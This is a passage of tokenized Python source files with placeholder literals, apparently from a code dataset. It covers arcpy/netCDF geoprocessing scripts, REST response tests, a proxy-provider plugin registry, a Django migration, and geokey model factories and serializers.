, dim1 , type_parameter . valueAsText ) <EOL> output_dims = list ( dataset . variable_dimension_names ( <EOL> variable_parameter . valueAsText ) ) <EOL> output_dims . remove ( dimension_parameter . valueAsText ) <EOL> output_dims = tuple ( output_dims ) <EOL> output_filename = output_parameter . valueAsText <EOL> output_name = output_var_parameter . valueAsText <EOL> dataset . xcopy ( dataset . data_variable_names ( ) , output_filename ) <EOL> with netCDF4 . Dataset ( output_filename , mode = "<STR_LIT:a>" ) as newdataset : <EOL> newvar = newdataset . createVariable ( output_name , var1 . dtype , output_dims ) <EOL> for attribute_name in var1 . ncattrs ( ) : <EOL> newvar . setncattr ( attribute_name , var1 . getncattr ( attribute_name ) ) <EOL> newvar [ : ] = result1 <EOL> arcpy . SetParameter ( <NUM_LIT:5> , output_name ) <EOL> return </s>
<s> '''<STR_LIT>''' <EOL> import arcpy <EOL> def getInputPointFC ( ) : <EOL> '''<STR_LIT>''' <EOL> fc = getInputPointFCFromXY ( <NUM_LIT> , <NUM_LIT> ) <EOL> return fc <EOL> def getInputPointFCFromXY ( x , y ) : <EOL> '''<STR_LIT>''' <EOL> inPoint = arcpy . Point ( x , y ) <EOL> inWGS84Point = arcpy . PointGeometry ( inPoint ) <EOL> sr = arcpy . SpatialReference ( <NUM_LIT> ) <EOL> inWGS84Point . spatial_reference = sr <EOL> fc = arcpy . CreateFeatureclass_management ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> None , "<STR_LIT>" , "<STR_LIT>" , <EOL> sr ) [ <NUM_LIT:0> ] <EOL> with arcpy . da . InsertCursor ( fc , [ "<STR_LIT>" ] ) as cursor : <EOL> cursor . insertRow ( [ inWGS84Point ] ) <EOL> inputFeatureSet = arcpy . FeatureSet ( ) <EOL> inputFeatureSet . load ( fc ) <EOL> return fc </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> import Configuration <EOL> from . import SunPositionAnalysisToolsTestSuite <EOL> from . import RangeRingTestSuite <EOL> def getVisibilityTestSuites ( ) : <EOL> '''<STR_LIT>''' <EOL> if Configuration . DEBUG == True : <EOL> print ( "<STR_LIT>" ) <EOL> Configuration . Logger . info ( "<STR_LIT>" ) <EOL> testSuite = unittest . TestSuite ( ) <EOL> testSuite . addTests ( SunPositionAnalysisToolsTestSuite . getSunPositionTestSuite ( ) ) <EOL> testSuite . addTests ( RangeRingTestSuite . getRangeRingTestSuite ( ) ) <EOL> return testSuite </s>
<s> '''<STR_LIT>''' <EOL> import sys , traceback <EOL> import arcpy <EOL> from arcpy import env <EOL> try : <EOL> domTable = arcpy . GetParameterAsText ( <NUM_LIT:0> ) <EOL> codeField = arcpy . GetParameterAsText ( <NUM_LIT:1> ) <EOL> descField = arcpy . GetParameterAsText ( <NUM_LIT:1> ) <EOL> dWorkspace = arcpy . GetParameterAsText ( <NUM_LIT:2> ) <EOL> domName = "<STR_LIT>" <EOL> updateOption = "<STR_LIT>" <EOL> arcpy . TableToDomain_management ( domTable , codeField , descField , dWorkspace , domName , update_option = updateOption ) <EOL> arcpy . SetParameter ( <NUM_LIT:3> , dWorkspace ) <EOL> except arcpy . ExecuteError : <EOL> msgs = arcpy . GetMessages ( ) <EOL> arcpy . AddError ( msgs ) <EOL> print ( msgs ) <EOL> except : <EOL> tb = sys . exc_info ( ) [ <NUM_LIT:2> ] <EOL> print ( "<STR_LIT>" % tb . tb_lineno ) <EOL> print ( e . message ) <EOL> tb = sys . exc_info ( ) [ <NUM_LIT:2> ] <EOL> tbinfo = traceback . format_tb ( tb ) [ <NUM_LIT:0> ] <EOL> pymsg = "<STR_LIT>" + tbinfo + "<STR_LIT>" + str ( sys . exc_info ( ) [ <NUM_LIT:1> ] ) <EOL> msgs = "<STR_LIT>" + arcpy . GetMessages ( ) + "<STR_LIT:\n>" <EOL> arcpy . AddError ( pymsg ) <EOL> arcpy . AddError ( msgs ) <EOL> print ( pymsg + "<STR_LIT:\n>" ) <EOL> print ( msgs ) </s>
<s> from unittest import TestCase , mock <EOL> from thorium . response import ( Response , DetailResponse , CollectionResponse , <EOL> ErrorResponse ) <EOL> from thorium . errors import MethodNotAllowedError , BadRequestError <EOL> from thorium import Resource , fields <EOL> class SimpleResource ( Resource ) : <EOL> id = fields . IntField ( ) <EOL> name = fields . CharField ( ) <EOL> class ComplexResource ( Resource ) : <EOL> id = fields . IntField ( notnull = True ) <EOL> name = fields . CharField ( default = '<STR_LIT>' ) <EOL> items = fields . ListField ( item_type = fields . IntField ( ) ) <EOL> hash_map = fields . DictField ( notnull = True ) <EOL> unique = fields . SetField ( ) <EOL> class TestResponse ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . request_mock = mock . MagicMock ( ) <EOL> self . response = Response ( request = self . request_mock ) <EOL> def test_location_header ( self ) : <EOL> self . request_mock . url = '<STR_LIT>' <EOL> self . response . location_header ( <NUM_LIT:10> ) <EOL> self . assertEqual ( self . response . headers [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> def test_get_response_data_raises_error ( self ) : <EOL> self . assertRaises ( NotImplementedError , self . response . get_response_data ) <EOL> class TestDetailResponse ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . request_mock = mock . MagicMock ( ) <EOL> self . response = DetailResponse ( request = self . request_mock ) <EOL> def test_attributes ( self ) : <EOL> self . assertEqual ( self . response . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( self . response . error , None ) <EOL> self . assertEqual ( self . response . meta , { '<STR_LIT>' : None } ) <EOL> self . assertEqual ( self . response . response_type , '<STR_LIT>' ) <EOL> self . assertEqual ( self . response . resource , None ) <EOL> def test_get_response_data_empty ( self ) : <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( data , None ) <EOL> def test_get_response_data ( self ) : <EOL> self . response . resource = SimpleResource ( id = <NUM_LIT:1> , name = '<STR_LIT:a>' ) <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( data , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> class TestCollectionResponse ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . request_mock = mock . MagicMock ( ) <EOL> self . request_mock . params . sort = None <EOL> self . request_mock . params . offset = None <EOL> self . request_mock . params . limit = None <EOL> self . response = CollectionResponse ( request = self . request_mock ) <EOL> self . test_data = [ <EOL> SimpleResource ( id = <NUM_LIT:1> , name = '<STR_LIT:a>' ) , <EOL> SimpleResource ( id = <NUM_LIT:2> , name = '<STR_LIT:c>' ) , <EOL> SimpleResource ( id = <NUM_LIT:4> , name = '<STR_LIT:b>' ) , <EOL> SimpleResource ( id = <NUM_LIT:3> , name = '<STR_LIT:d>' ) , <EOL> SimpleResource ( id = <NUM_LIT:5> , name = '<STR_LIT:d>' ) , <EOL> ] <EOL> self . test_data_none = [ <EOL> SimpleResource ( id = <NUM_LIT:1> , name = '<STR_LIT:a>' ) , <EOL> SimpleResource ( id = <NUM_LIT:1> , name = None ) , <EOL> SimpleResource ( id = <NUM_LIT:3> , name = '<STR_LIT:b>' ) , <EOL> ] <EOL> self . test_data_complex = [ <EOL> ComplexResource ( id = <NUM_LIT:3> , items = [ ] , hash_map = { '<STR_LIT>' : <NUM_LIT:1> } , unique = set ( ) ) , <EOL> ComplexResource ( id = <NUM_LIT:1> , items = [ <NUM_LIT:1> ] , hash_map = { } , unique = None ) , <EOL> ComplexResource ( id = <NUM_LIT:2> , items = None , hash_map = { } , unique = { <NUM_LIT:1> , <NUM_LIT:2> } ) <EOL> ] <EOL> def test_attributes ( self ) : <EOL> self . assertEqual ( self . response . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( self . response . error , None ) <EOL> self . assertEqual ( <EOL> self . response . meta , <EOL> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> } <EOL> } <EOL> ) <EOL> self . assertEqual ( self . response . response_type , '<STR_LIT>' ) <EOL> self . assertEqual ( self . response . resources , [ ] ) <EOL> def test_get_response_data_empty ( self ) : <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( data , [ ] ) <EOL> def test_get_response_data ( self ) : <EOL> self . response . resources = [ SimpleResource ( id = <NUM_LIT:1> , name = '<STR_LIT:a>' ) ] <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( data , [ { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ] ) <EOL> def test_get_response_data_sort_ascending ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , len ( self . test_data ) ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:2> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:3> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:4> ] , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> def test_get_response_data_sort_ascending_multiple ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , len ( self . test_data ) ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:2> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:3> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:4> ] , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> def test_get_response_data_sort_descending ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , len ( self . test_data ) ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:2> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:3> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:4> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> def test_get_response_data_sort_descending_multiple ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , len ( self . test_data ) ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:2> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:3> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:4> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> def test_get_response_data_sort_mixed ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , len ( self . test_data ) ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:5> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:2> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:3> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:4> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> def test_get_response_data_sort_with_none ( self ) : <EOL> self . response . resources = self . test_data_none <EOL> self . response . sort = '<STR_LIT>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , len ( self . test_data_none ) ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : None } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:1> , '<STR_LIT:name>' : '<STR_LIT:a>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:2> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> def test_get_response_data_sort_invalid ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . resources = self . test_data_complex <EOL> self . response . sort = '<STR_LIT>' <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . sort = '<STR_LIT>' <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . sort = '<STR_LIT>' <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> def test_get_response_data_paginate ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> def test_get_response_data_paginate_cast ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT:id>' <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:2>' <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:2>' <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:3> , '<STR_LIT:name>' : '<STR_LIT:d>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> def test_get_response_data_paginate_with_sort ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:2> <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:2> <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> def test_get_response_data_pagination_out_of_bounds ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:5> <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:10> <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( data , [ ] ) <EOL> def test_get_response_data_invalid_offset ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = - <NUM_LIT:1> <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:10> <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . offset = '<STR_LIT>' <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . offset = True <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> def test_get_response_data_invalid_limit ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . limit = - <NUM_LIT:1> <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . limit = '<STR_LIT>' <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . limit = False <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> class TestErrorResponse ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . request_mock = mock . MagicMock ( ) <EOL> self . error = MethodNotAllowedError ( ) <EOL> self . response = ErrorResponse ( http_error = self . error , <EOL> request = self . request_mock ) <EOL> def test_attributes ( self ) : <EOL> self . assertEqual ( self . response . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( self . response . error , str ( self . error ) ) <EOL> self . assertEqual ( self . response . meta , { '<STR_LIT>' : None } ) <EOL> self . assertEqual ( self . response . response_type , '<STR_LIT:error>' ) <EOL> def test_get_response_data_empty ( self ) : <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( data , None ) </s>
<s> import itertools <EOL> import random <EOL> import requests <EOL> import logging <EOL> registry = { } <EOL> class Plugin ( type ) : <EOL> def __new__ ( metacls , name , bases , namespace , ** kwargs ) : <EOL> cls = type . __new__ ( metacls , name , bases , dict ( namespace ) ) <EOL> if hasattr ( cls , "<STR_LIT>" ) : <EOL> registry [ cls . __provider_name__ ] = cls <EOL> return cls <EOL> class TeleportationProvider ( object ) : <EOL> __metaclass__ = Plugin <EOL> GEOIP_URL = '<STR_LIT>' <EOL> def __init__ ( self , name , countries , debug = False , ** kwargs ) : <EOL> self . name = name <EOL> self . countries = countries <EOL> self . debug = debug <EOL> self . kwargs = kwargs <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" . format ( self . __provider_name__ , self . name ) <EOL> def can_teleport_to ( self , place ) : <EOL> return place in self . countries <EOL> def teleport ( self , place ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented <EOL> @ property <EOL> def is_proxy ( self ) : <EOL> return False <EOL> def where_we_teleported ( self ) : <EOL> return requests . get ( self . GEOIP_URL , proxies = self . get_proxies ( ) ) . text . lower ( ) <EOL> def go_home ( self ) : <EOL> pass <EOL> def get_proxies ( self ) : <EOL> return { } <EOL> def get_peer_address ( self ) : <EOL> raise NotImplementedError <EOL> def _shuffle ( i ) : <EOL> i = list ( i ) <EOL> random . shuffle ( i ) <EOL> return i <EOL> def _construct ( args ) : <EOL> if args [ "<STR_LIT:type>" ] not in registry : <EOL> raise RuntimeError ( "<STR_LIT>" . format ( args [ "<STR_LIT:type>" ] ) ) <EOL> return registry [ args [ "<STR_LIT:type>" ] ] ( ** args ) <EOL> class Teleport ( object ) : <EOL> def __init__ ( self , config ) : <EOL> self . config = config <EOL> def get_sorted_providers ( self ) : <EOL> by_priority = lambda provider : provider [ "<STR_LIT>" ] <EOL> sorted_by_priority = sorted ( self . config [ "<STR_LIT>" ] , key = by_priority ) <EOL> grouped_by_priority = itertools . groupby ( sorted_by_priority , key = by_priority ) <EOL> res = [ ] <EOL> for _ , providers in grouped_by_priority : <EOL> for args in _shuffle ( providers ) : <EOL> res . append ( _construct ( args ) ) <EOL> return res <EOL> def who_can_teleport_to ( self , place ) : <EOL> return [ <EOL> provider for provider in self . get_sorted_providers ( ) <EOL> if provider . can_teleport_to ( place ) <EOL> ] <EOL> def goto ( self , place ) : <EOL> """<STR_LIT>""" <EOL> providers = self . who_can_teleport_to ( place ) <EOL> if not providers : <EOL> raise RuntimeError ( '<STR_LIT>' . format ( place ) ) <EOL> logging . info ( '<STR_LIT>' , place , providers ) <EOL> _errors = [ ] <EOL> for provider in providers : <EOL> logging . info ( '<STR_LIT>' . format ( provider ) ) <EOL> try : <EOL> if provider . teleport ( place ) : <EOL> return provider <EOL> logging . error ( '<STR_LIT>' . format ( provider ) ) <EOL> provider . go_home ( ) <EOL> except Exception as e : <EOL> logging . exception ( '<STR_LIT>' , provider ) <EOL> _errors . append ( e ) <EOL> raise RuntimeError ( '<STR_LIT>' . format ( place , _errors ) ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> from django . conf import settings <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . BooleanField ( default = False ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT:user>' , <EOL> field = models . ForeignKey ( related_name = '<STR_LIT>' , to = settings . AUTH_USER_MODEL ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import factory <EOL> from geokey . core . tests . helpers . image_helpers import get_image <EOL> from geokey . users . tests . model_factories import UserFactory <EOL> from geokey . projects . tests . model_factories import ProjectFactory <EOL> from . . models import ( <EOL> Category , TextField , NumericField , DateTimeField , DateField , TimeField , <EOL> LookupField , LookupValue , Field , MultipleLookupField , MultipleLookupValue <EOL> ) <EOL> class CategoryFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = Category <EOL> creator = factory . SubFactory ( UserFactory ) <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> project = factory . SubFactory ( ProjectFactory ) <EOL> status = '<STR_LIT>' <EOL> class FieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = Field <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> order = <NUM_LIT:0> <EOL> class TextFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = TextField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class NumericFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = NumericField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class DateTimeFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = DateTimeField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class DateFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = DateField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class TimeFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = TimeField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class LookupFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = LookupField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class LookupValueFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = LookupValue <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> symbol = get_image ( file_name = '<STR_LIT>' ) <EOL> field = factory . SubFactory ( LookupFieldFactory ) <EOL> status = '<STR_LIT>' <EOL> class MultipleLookupFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = MultipleLookupField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class MultipleLookupValueFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = MultipleLookupValue <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> symbol = get_image ( file_name = '<STR_LIT>' ) <EOL> field = factory . SubFactory ( MultipleLookupFieldFactory ) <EOL> status = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> import requests <EOL> import tempfile <EOL> from django . core import files <EOL> from django . core . exceptions import PermissionDenied , ValidationError <EOL> from easy_thumbnails . files import get_thumbnailer <EOL> from easy_thumbnails . exceptions import InvalidImageFormatError <EOL> from rest_framework import serializers <EOL> from rest_framework_gis import serializers as geoserializers <EOL> from rest_framework . serializers import BaseSerializer <EOL> from geokey . categories . serializers import CategorySerializer <EOL> from geokey . categories . models import Category <EOL> from geokey . users . serializers import UserSerializer <EOL> from . models import ( <EOL> Observation , <EOL> Location , <EOL> Comment , <EOL> MediaFile , <EOL> ImageFile , <EOL> VideoFile , <EOL> AudioFile <EOL> ) <EOL> class LocationSerializer ( geoserializers . GeoFeatureModelSerializer ) : <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> model = Location <EOL> geo_field = '<STR_LIT>' <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT:status>' , '<STR_LIT>' ) <EOL> write_only_fields = ( '<STR_LIT:status>' , ) <EOL> class LocationContributionSerializer ( serializers . ModelSerializer ) : <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> model = Location <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT:status>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> write_only_fields = ( '<STR_LIT:status>' 